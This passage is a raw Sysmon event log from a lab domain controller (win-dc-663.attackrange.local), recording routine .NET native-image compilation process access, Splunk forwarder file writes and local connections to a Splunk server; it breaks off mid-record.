21:03:36.260{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61415-false10.0.1.12-8000- 10341000x800000000000000020214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.722{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AB-60D3-5003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.706{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1AB-60D3-5003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.706{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AB-60D3-5003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.550{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AB-60D3-4F03-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.534{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AB-60D3-4F03-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.534{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AB-60D3-4F03-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.253{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7ABAF5CABD5746C37F50BDA14F88DAD,SHA256=8230CC99E29C08C09986F358D47D2BC572D1AC9EB3044F012EF3CAD276FEBC08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.206{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B6191918AA25422CF3F865B1D7248A,SHA256=AFA95D463B33CF6245D3F701B4917B9E6217A378E1E66833A04AB5C501D84887,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.159{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AB-60D3-4E03-00000000CF01}2440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.128{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1AB-60D3-4E03-00000000CF01}2440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.128{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AB-60D3-4E03-00000000CF01}2440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.081{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:40.659{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56EABB00BC89659B10F2E8B89F4E6353,SHA256=FC0DC4A4295E17EB2E19EDAEB1C31A6E88F3E20E45AEE88BF70C362C5802AD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:40.221{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F893C8F285CD37806864A58BFBE3C05D,SHA256=FDD2E112C2DA49D880AF7C071832D4C14F8F2185CCD31600B8F5B4F5AC70A864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:41.284{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02300F557A0F06B16E8DD5958E02FCFC,SHA256=30DE3812B61EEB6F7788A61E150A3D253E953696871DAA3AA4522CA0FD3D0B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:39.135{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61416-false10.0.1.12-8089- 10341000x800000000000000020226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.909{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AE-60D3-5203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.893{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1AE-60D3-5203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.878{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AE-60D3-5203-00000000CF01}6400C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.846{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AE-60D3-5103-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.831{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AE-60D3-5103-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.815{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AE-60D3-5103-00000000CF01}5516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:42.643{4DB9351A-A1AB-60D3-5003-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1898-0\Microsoft.Build.dll2021-06-23 21:03:42.643 23542300x800000000000000020219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:42.378{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE9274D0A68849DE080A5A273EBD1E6,SHA256=A89EBD812B5C3B5AA38C65F540E78CF2F7BEF314098DAF0C227E3F0182F96CA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.815{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ED6036A40EABCE5086B9846D75421C2,SHA256=7116A52A3CFCE855B8468952A841036BE9598F6CCA9504A029ECD5B7FB07BE5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.471{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C257FCFD58E76ED66575EB77DCA247F7,SHA256=AA118C05019E1948F3EC25EA6EDDD29018050C3F38E9849CB70DA91ABD802FF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.175{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1AF-60D3-5403-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.159{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1AF-60D3-5403-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:43.159{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1AF-60D3-5403-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 